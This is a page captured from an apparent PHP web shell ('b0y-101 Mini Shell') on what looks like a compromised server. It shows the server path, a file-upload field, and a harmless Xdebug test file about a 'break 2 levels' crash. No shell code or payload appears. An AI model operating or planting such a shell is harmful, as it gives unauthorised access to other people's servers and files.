b0y-101 Mini Shell


Current Path : E:/www/b-group.old/spfin - Copy/testpayment/src/xdebug/tests/coverage/
File Upload :
Current File : E:/www/b-group.old/spfin - Copy/testpayment/src/xdebug/tests/coverage/bug00670.phpt

--TEST--
Test for bug #670: Xdebug crashes with broken "break x" code
--INI--
xdebug.mode=coverage
--FILE--
<?php
xdebug_start_code_coverage( XDEBUG_CC_DEAD_CODE | XDEBUG_CC_UNUSED );
include '670-ConsistentHashing.inc';
echo "OK\n";
?>
--EXPECTF--
Fatal error: Cannot 'break' 2 levels in %s670-ConsistentHashing.inc on line 146

Copyright © 2019 by b0y-101